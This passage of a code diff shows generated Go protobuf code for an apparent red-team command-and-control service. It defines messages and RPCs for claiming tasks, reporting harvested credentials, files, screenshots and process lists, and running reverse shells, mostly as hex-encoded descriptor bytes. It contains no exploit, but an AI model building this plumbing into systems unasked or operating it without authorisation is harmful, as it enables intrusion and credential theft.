0x63, 0x68, 0x2e, 0x43, 0x72, 0x65, + 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x0a, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, + 0x69, 0x61, 0x6c, 0x42, 0x09, 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x22, 0x1a, + 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, + 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0xe8, 0x01, 0x0a, 0x11, 0x52, + 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, + 0x12, 0x34, 0x0a, 0x0c, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, + 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0f, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, + 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x0b, 0x74, 0x61, 0x73, 0x6b, 0x43, + 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x44, 0x0a, 0x12, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, + 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, + 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x10, 0x73, 0x68, 0x65, 0x6c, + 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x26, 0x0a, 0x04, + 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x12, 0x2e, 0x63, 0x32, 0x2e, + 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, + 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x04, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, + 0x69, 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x42, 0x09, 0x0a, 0x07, 0x63, 0x6f, + 0x6e, 0x74, 0x65, 0x78, 0x74, 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, + 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0xcc, 0x01, 0x0a, 0x18, + 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, + 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x34, 0x0a, 0x0c, 0x74, 0x61, 0x73, 0x6b, + 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0f, + 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, + 0x00, 0x52, 0x0b, 0x74, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x44, + 0x0a, 0x12, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, + 0x74, 0x65, 0x78, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, + 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, + 0x48, 0x00, 0x52, 0x10, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, + 0x74, 0x65, 0x78, 0x74, 0x12, 0x29, 0x0a, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x18, 0x03, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, + 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x42, + 0x09, 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, + 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x6c, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, + 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x4d, 0x65, 0x73, 0x73, 0x61, + 0x67, 0x65, 0x12, 0x29, 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x01, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x0f, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, + 0x74, 0x65, 0x78, 0x74, 0x52, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x26, 0x0a, + 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, + 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, 0x6f, + 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x7b, 0x0a, 0x1c, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x53, + 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x4d, 0x65, + 0x73, 0x73, 0x61, 0x67, 0x65, 0x12, 0x2e, 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, + 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, 0x6c, + 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x52, 0x07, 0x63, 0x6f, + 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x2b, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, + 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x13, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, + 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, + 0x75, 0x74, 0x22, 0xb0, 0x01, 0x0a, 0x13, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x4f, 0x75, 0x74, + 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x3e, 0x0a, 0x0b, 0x74, 0x61, + 0x73, 0x6b, 0x5f, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, + 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, + 0x75, 0x74, 0x70, 0x75, 0x74, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x48, 0x00, 0x52, 0x0a, + 0x74, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x4e, 0x0a, 0x11, 0x73, 0x68, + 0x65, 0x6c, 0x6c, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, + 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x20, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, + 0x74, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x48, 0x00, 0x52, 0x0f, 0x73, 0x68, 0x65, 0x6c, 0x6c, + 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x42, 0x09, 0x0a, 0x07, 0x6d, 0x65, + 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x16, 0x0a, 0x14, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x4f, + 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0xe1, 0x01, + 0x0a, 0x13, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, + 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x34, 0x0a, 0x0c, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, + 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0f, 0x2e, 0x63, 0x32, + 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x0b, + 0x74, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x44, 0x0a, 0x12, 0x73, + 0x68, 0x65, 0x6c, 0x6c, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, + 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, + 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, + 0x10, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, + 0x74, 0x12, 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, 0x32, + 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, + 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, + 0x6e, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0c, + 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x42, 0x09, 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, + 0x74, 0x22, 0x5b, 0x0a, 0x14, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, + 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, + 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, + 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, + 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, + 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x22, 0xbe, + 0x01, 0x0a, 0x13, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x52, + 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x34, 0x0a, 0x0c, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, + 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0f, 0x2e, 0x63, + 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, + 0x0b, 0x74, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x44, 0x0a, 0x12, + 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, + 0x78, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, + 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, + 0x52, 0x10, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, + 0x78, 0x74, 0x12, 0x20, 0x0a, 0x04, 0x6d, 0x6f, 0x74, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, + 0x32, 0x0c, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x4d, 0x6f, 0x74, 0x65, 0x52, 0x04, + 0x6d, 0x6f, 0x74, 0x65, 0x42, 0x09, 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x22, + 0x38, 0x0a, 0x14, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x20, 0x0a, 0x04, 0x6d, 0x6f, 0x74, 0x65, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0c, 0x2e, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x4d, + 0x6f, 0x74, 0x65, 0x52, 0x04, 0x6d, 0x6f, 0x74, 0x65, 0x2a, 0x70, 0x0a, 0x0e, 0x52, 0x65, 0x70, + 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x12, 0x20, 0x0a, 0x1c, 0x52, + 0x45, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x46, 0x49, 0x4c, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, + 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x1b, 0x0a, + 0x17, 0x52, 0x45, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x46, 0x49, 0x4c, 0x45, 0x5f, 0x4b, 0x49, 0x4e, + 0x44, 0x5f, 0x4f, 0x4e, 0x44, 0x49, 0x53, 0x4b, 0x10, 0x01, 0x12, 0x1f, 0x0a, 0x1b, 0x52, 0x45, + 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x46, 0x49, 0x4c, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, + 0x43, 0x52, 0x45, 0x45, 0x4e, 0x53, 0x48, 0x4f, 0x54, 0x10, 0x02, 0x2a, 0x8f, 0x01, 0x0a, 0x17, + 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, + 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x12, 0x2a, 0x0a, 0x26, 0x52, 0x45, 0x56, 0x45, 0x52, + 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, + 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, + 0x44, 0x10, 0x00, 0x12, 0x23, 0x0a, 0x1f, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, + 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, + 0x44, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, 0x01, 0x12, 0x23, 0x0a, 0x1f, 0x52, 0x45, 0x56, 0x45, + 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, + 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x50, 0x49, 0x4e, 0x47, 0x10, 0x02, 0x32, 0xb9, 0x04, + 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, + 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, + 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, + 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, + 0x65, 0x22, 0x00, 0x12, 0x3d, 0x0a, 0x0a, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, + 0x74, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, + 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x46, 0x65, + 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, + 0x30, 0x01, 0x12, 0x4d, 0x0a, 0x10, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, + 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x12, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, + 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, + 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, + 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, + 0x65, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, + 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, + 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, + 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, + 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, + 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, + 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, + 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, + 0x73, 0x65, 0x12, 0x43, 0x0a, 0x0c, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x4f, 0x75, 0x74, 0x70, + 0x75, 0x74, 0x12, 0x17, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x4f, 0x75, + 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, + 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, + 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x0c, 0x52, 0x65, 0x76, 0x65, 0x72, + 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x17, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, + 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, + 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, + 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x28, 0x01, 0x30, 0x01, + 0x12, 0x47, 0x0a, 0x0c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, + 0x12, 0x17, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x6f, 0x72, 0x74, + 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x43, + 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, + 0x6e, 0x73, 0x65, 0x22, 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, 0x23, 0x5a, 0x21, 0x72, 0x65, 0x61, + 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, + 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, + 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, +}) var ( file_c2_proto_rawDescOnce sync.Once @@ -1801,100 +2497,115 @@ func file_c2_proto_rawDescGZIP() []byte { return file_c2_proto_rawDescData } -var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 3) -var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 27) +var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 4) +var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 31) var file_c2_proto_goTypes = []any{ - (ReverseShellMessageKind)(0), // 0: c2.ReverseShellMessageKind - (Transport_Type)(0), // 1: c2.Transport.Type - (Host_Platform)(0), // 2: c2.Host.Platform - (*Agent)(nil), // 3: c2.Agent - (*Transport)(nil), // 4: c2.Transport - (*AvailableTransports)(nil), // 5: c2.AvailableTransports - (*Beacon)(nil), // 6: c2.Beacon - (*Host)(nil), // 7: c2.Host - (*Task)(nil), // 8: c2.Task - (*ShellTask)(nil), // 9: c2.ShellTask - (*TaskError)(nil), // 10: c2.TaskError - (*TaskOutput)(nil), // 11: c2.TaskOutput - (*ShellTaskOutput)(nil), // 12: c2.ShellTaskOutput - (*TaskContext)(nil), // 13: c2.TaskContext - (*ClaimTasksRequest)(nil), // 14: c2.ClaimTasksRequest - (*ClaimTasksResponse)(nil), // 15: c2.ClaimTasksResponse - (*FetchAssetRequest)(nil), // 16: c2.FetchAssetRequest - (*FetchAssetResponse)(nil), // 17: c2.FetchAssetResponse - (*ReportCredentialRequest)(nil), // 18: c2.ReportCredentialRequest - (*ReportCredentialResponse)(nil), // 19: c2.ReportCredentialResponse - (*ReportFileRequest)(nil), // 20: c2.ReportFileRequest - (*ReportFileResponse)(nil), // 21: c2.ReportFileResponse - (*ReportProcessListRequest)(nil), // 22: c2.ReportProcessListRequest - (*ReportProcessListResponse)(nil), // 23: c2.ReportProcessListResponse - (*ReportTaskOutputRequest)(nil), // 24: c2.ReportTaskOutputRequest - (*ReportTaskOutputResponse)(nil), // 25: c2.ReportTaskOutputResponse - (*ReverseShellRequest)(nil), // 26: c2.ReverseShellRequest - (*ReverseShellResponse)(nil), // 27: c2.ReverseShellResponse - (*CreatePortalRequest)(nil), // 28: c2.CreatePortalRequest - (*CreatePortalResponse)(nil), // 29: c2.CreatePortalResponse - (*epb.Tome)(nil), // 30: eldritch.Tome - (*timestamppb.Timestamp)(nil), // 31: google.protobuf.Timestamp - (*epb.Credential)(nil), // 32: eldritch.Credential - (*epb.File)(nil), // 33: eldritch.File - (*epb.ProcessList)(nil), // 34: eldritch.ProcessList - (*portalpb.Mote)(nil), // 35: portal.Mote + (ReportFileKind)(0), // 0: c2.ReportFileKind + (ReverseShellMessageKind)(0), // 1: c2.ReverseShellMessageKind + (Transport_Type)(0), // 2: c2.Transport.Type + (Host_Platform)(0), // 3: c2.Host.Platform + (*Agent)(nil), // 4: c2.Agent + (*Transport)(nil), // 5: c2.Transport + (*AvailableTransports)(nil), // 6: c2.AvailableTransports + (*Beacon)(nil), // 7: c2.Beacon + (*Host)(nil), // 8: c2.Host + (*Task)(nil), // 9: c2.Task + (*ShellTask)(nil), // 10: c2.ShellTask + (*TaskError)(nil), // 11: c2.TaskError + (*TaskOutput)(nil), // 12: c2.TaskOutput + (*ShellTaskError)(nil), // 13: c2.ShellTaskError + (*ShellTaskOutput)(nil), // 14: c2.ShellTaskOutput + (*TaskContext)(nil), // 15: c2.TaskContext + (*ShellTaskContext)(nil), // 16: c2.ShellTaskContext + (*ClaimTasksRequest)(nil), // 17: c2.ClaimTasksRequest + (*ClaimTasksResponse)(nil), // 18: c2.ClaimTasksResponse + (*FetchAssetRequest)(nil), // 19: c2.FetchAssetRequest + (*FetchAssetResponse)(nil), // 20: c2.FetchAssetResponse + (*ReportCredentialRequest)(nil), // 21: c2.ReportCredentialRequest + (*ReportCredentialResponse)(nil), // 22: c2.ReportCredentialResponse + (*ReportFileRequest)(nil), // 23: 